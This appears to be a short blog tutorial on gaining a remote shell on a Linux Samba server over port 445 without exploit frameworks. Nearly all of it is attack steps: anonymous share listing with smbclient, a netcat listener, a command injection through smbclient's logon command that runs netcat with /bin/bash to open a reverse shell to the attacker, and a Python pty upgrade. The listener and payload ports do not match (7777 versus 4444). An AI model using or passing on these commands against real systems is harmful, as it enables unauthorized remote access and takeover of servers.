This post is about exploitation smb port 445 running on remote Linux system, our target is take remote access via unprotected samba server without using any exploitation tool or framework
Prerequisite
How to use netcat
SMBclient
Step 1. Scan target machine and check for SMB open port, in my case target ip is 192.168.1.134
Target m/c → 192.168.1.134
Attacker m/c → 192.168.1.129 (kali linux)
kindly note that all task has bene performed inside attacker m/c 192.168.1.129
Use SMB client and check for anonymous access
smbclient -L 192.168.1.134
{password is othing just hit enter}
since we know that “tmp” directory is present and there anonymous access over system let
let’s open netcat for accepting reverse connection in terminal -1
nc -lvp 7777
In terminal 2 Let take access to tmp directory directly on samba server using
smbclient //192.168.1.134/tmp
type help command in terminal 2
Since logon command is there we can make reverse connection using the same
logon “/=`nc ‘attack box ip’ 4444 -e /bin/bash`"
in terminal 1 you will get reverse shell
Type following command to take terminal view from shell in terminal 1
python -c “import pty;pty.spawn(‘/bin/bash’);”
Please feel free to contact me in case of any query nmapp@gmail.com